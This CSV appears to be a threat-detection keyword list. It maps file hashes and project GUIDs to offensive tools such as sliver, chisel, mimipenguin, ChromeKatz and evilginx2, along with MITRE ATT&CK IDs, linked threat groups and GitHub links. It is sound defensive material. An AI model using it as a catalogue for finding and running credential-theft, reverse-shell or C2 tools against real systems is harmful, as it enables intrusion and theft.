"*fd47e1128af3726647068ef2aafc9c00fe1403bf2a2b079f20994efff2db492d*",".{0,1000}fd47e1128af3726647068ef2aafc9c00fe1403bf2a2b079f20994efff2db492d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44642"
"*fd47e488528dfd7d415d1acf06332b12f2d40702328a467ef5d04c4c0a892fe6*",".{0,1000}fd47e488528dfd7d415d1acf06332b12f2d40702328a467ef5d04c4c0a892fe6.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44643"
"*fd52f1cd337f51b76463cc12d6d0c32108a324d6d72d57c852326053ca608495*",".{0,1000}fd52f1cd337f51b76463cc12d6d0c32108a324d6d72d57c852326053ca608495.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","44646"
"*fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb*",".{0,1000}fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44648"
"*fd5944e10bd3a9c8bbb73615c6b5c730e0d0b9bd9fcaee9a1b5d40d8a95078b8*",".{0,1000}fd5944e10bd3a9c8bbb73615c6b5c730e0d0b9bd9fcaee9a1b5d40d8a95078b8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44649"
"*fd6af36ad90f3287d849c6542f3dacd29cc06cb01bdf618a2168d0968a757894*","#f","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","44651"
"*FD6BDF7A-FEF4-4B28-9027-5BF750F08048*",".{0,1000}FD6BDF7A\-FEF4\-4B28\-9027\-5BF750F08048.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44653"
"*fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4*",".{0,1000}fd735c976b71fe21f1f35dca8977865e69e4bb3a49ffb7c64c65d3a235d237a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44654"
"*fd744dbf0650a39ffac5325802e88075610333f5e4e0ef538da4dbfe91a712d0*",".{0,1000}fd744dbf0650a39ffac5325802e88075610333f5e4e0ef538da4dbfe91a712d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44655"
"*fd75b0dd9d0f11263480daccf04b635ddf74eae974794a80def9f6d2d511eb86*",".{0,1000}fd75b0dd9d0f11263480daccf04b635ddf74eae974794a80def9f6d2d511eb86.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44656"
"*fd781d2a9ae86e8131b370be6b96807f532b41f093d8d85f906e9c2ece2f6c64*",".{0,1000}fd781d2a9ae86e8131b370be6b96807f532b41f093d8d85f906e9c2ece2f6c64.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44657"
"*fd7bbbf6cbc5d86a8c6ec8caa40aef39961bf9b3d15b515dbcd2469bf15e390b*",".{0,1000}fd7bbbf6cbc5d86a8c6ec8caa40aef39961bf9b3d15b515dbcd2469bf15e390b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44658"
"*fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7*",".{0,1000}fd8303c18bb8893e7d539cced09d4765805a37bd9ac5c92951ab381c70eec2a7.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","44660"
"*fd874b4038adf9ab4f9008aa429591c825c879a51e1efc6c80d8491a7eadfdab*",".{0,1000}fd874b4038adf9ab4f9008aa429591c825c879a51e1efc6c80d8491a7eadfdab.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44661"
"*fd888cbda2c55514b80fc0aa97688abc5490ee41b8ca5c29e2f4ed3f5433a3d0*",".{0,1000}fd888cbda2c55514b80fc0aa97688abc5490ee41b8ca5c29e2f4ed3f5433a3d0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44662"
"*fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171*",".{0,1000}fd8dddeb318eb9ccdeea441dfed3a0b01c1187e1b165b75e7aaf515142abb171.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44663"
"*FD93D181-2EC5-4863-8A8F-5F8C84C06B35*",".{0,1000}FD93D181\-2EC5\-4863\-8A8F\-5F8C84C06B35.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44665"
"*fd97e0ace21c435be9c5d10af9c2c04685069007614db6f46b06237beee2a458*",".{0,1000}fd97e0ace21c435be9c5d10af9c2c04685069007614db6f46b06237beee2a458.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","44666"
"*fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8*",".{0,1000}fd9af8832336604029ef8f8ce6c35f5b24efdcd593b5092ed4774dae62d8e9f8.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","44667"
"*fd9e681fed790247964ded20c2e72d566e55f7770f05838f2490521ac97472f2*",".{0,1000}fd9e681fed790247964ded20c2e72d566e55f7770f05838f2490521ac97472f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44668"
"*fda01773787fa74e66a7ecb944653dddd36fc7b298ff32ebbb06ab2099df4478*",".{0,1000}fda01773787fa74e66a7ecb944653dddd36fc7b298ff32ebbb06ab2099df4478.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44669"
"*fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07*",".{0,1000}fda9ab818e038db8e7813ebfc1cdf52d3726c0ea08019b40d8b6088273d1bb07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44672"
"*fda9f77c0d77595aa3ca203b65a883e93bcf05603affd7911cff9e96da0e7bba*",".{0,1000}fda9f77c0d77595aa3ca203b65a883e93bcf05603affd7911cff9e96da0e7bba.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44673"
"*fdacab27da00156282cbb603a0cb61d6e62521294c4f2cba576ef156f2b4cf2d*",".{0,1000}fdacab27da00156282cbb603a0cb61d6e62521294c4f2cba576ef156f2b4cf2d.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44675"
"*fdad34a59a97f03cc8b8da455730e1bf8557c95dcf866b38971afa75e0c34026*",".{0,1000}fdad34a59a97f03cc8b8da455730e1bf8557c95dcf866b38971afa75e0c34026.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44676"
"*fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04*",".{0,1000}fdb1df0047a31328f0796bd07caf642efc35651ad78389025eb5afa2748bcd04.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#filehash","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","44677"
"*fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb*",".{0,1000}fdb2a63af6a5ae9aa60ceceb9e928188ac793a89f5282ed44c0d4be5f79559bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44678"
"*fdbf3b81cd69caf5230d76a8b039fd99*",".{0,1000}fdbf3b81cd69caf5230d76a8b039fd99.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","44680"
"*fdc0ec0cc895f5b0440d942c0ab60eedeb6e6dca64a93cecb6f1685c0a7b99ae*",".{0,1000}fdc0ec0cc895f5b0440d942c0ab60eedeb6e6dca64a93cecb6f1685c0a7b99ae.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44682"
"*fdc5410744b30ec6b9140458af7cda10c329d512934fdbdffbbef9c7c537b2ef*",".{0,1000}fdc5410744b30ec6b9140458af7cda10c329d512934fdbdffbbef9c7c537b2ef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44684"
"*fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d*",".{0,1000}fdc984c09659c0ebf330d319bdebc772440dde7543aa6f74fd523a02fca2811d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44685"
"*fdcd0eb6e702e697cfda7697b058232f8b0cebbf48dbaf5fcc284ea1ca1f1b59*",".{0,1000}fdcd0eb6e702e697cfda7697b058232f8b0cebbf48dbaf5fcc284ea1ca1f1b59.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44686"
"*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44688"
"*FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9*",".{0,1000}FDD654F5\-5C54\-4D93\-BF8E\-FAF11B00E3E9.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#GUIDproject","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","44689"
"*fdd96ea14514b4f377414ec9bec2ba356e0d4ea8f019ed34a9764f960884b386*",".{0,1000}fdd96ea14514b4f377414ec9bec2ba356e0d4ea8f019ed34a9764f960884b386.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44690"
"*fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8*",".{0,1000}fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44694"
"*fde1b109f9704ff7.css*",".{0,1000}fde1b109f9704ff7\.css.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","44695"
"*fde22ab519e821b78566ad716fe961d55cec7a447be32e5405f46d10f2e9b233*",".{0,1000}fde22ab519e821b78566ad716fe961d55cec7a447be32e5405f46d10f2e9b233.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44696"
"*fde28cc5a25646c7b2579cd11a6914077500fabb172f8b44fd56bf9cfbad0511*",".{0,1000}fde28cc5a25646c7b2579cd11a6914077500fabb172f8b44fd56bf9cfbad0511.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44697"
"*fde8744f64a41afea0aca93478a8e310a86dd3ac1e716bfdd6687e954ad2231e*",".{0,1000}fde8744f64a41afea0aca93478a8e310a86dd3ac1e716bfdd6687e954ad2231e.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","44698"
"*fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee*",".{0,1000}fdeb5626b8c7d92daf188d05564398134d3dd50c9d1d2b09352a5d5a0d2757ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44700"
"*FDF5A0F3-73DA-4A8B-804F-EDD499A176EF*",".{0,1000}FDF5A0F3\-73DA\-4A8B\-804F\-EDD499A176EF.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","44702"
"*fdfbc173fa9fe1094f92f5141b4f257cf071baf69eb62f86b3ba547196eb5a60*",".{0,1000}fdfbc173fa9fe1094f92f5141b4f257cf071baf69eb62f86b3ba547196eb5a60.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44704"
"*fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376*",".{0,1000}fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44705"
"*FE068381-F170-4C37-82C4-11A81FE60F1A*",".{0,1000}FE068381\-F170\-4C37\-82C4\-11A81FE60F1A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44706"
"*fe06cf10cad44865c87cb7a2eef5d3b7614309ce016389add8260f19f16d770b*",".{0,1000}fe06cf10cad44865c87cb7a2eef5d3b7614309ce016389add8260f19f16d770b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44707"
"*fe0a341f1d837cff5ed9b847e0c61d4c9d5f183c00eff93eeb8c1f0ac3730452*",".{0,1000}fe0a341f1d837cff5ed9b847e0c61d4c9d5f183c00eff93eeb8c1f0ac3730452.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44708"
"*FE102D27-DEC4-42E2-BF69-86C79E08B67D*",".{0,1000}FE102D27\-DEC4\-42E2\-BF69\-86C79E08B67D.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#GUIDproject","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","44710"
"*fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80*",".{0,1000}fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","44711"
"*fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80*",".{0,1000}fe19fcf12c8c18e41b73c3888d596a488f0a31c44ed459cba6d101660bfd7e80.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","44712"
"*fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6*",".{0,1000}fe1ae959f9af863a11cefad541eb791a01e5bb9931cf5c57e478236ddad92ae6.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","44713"
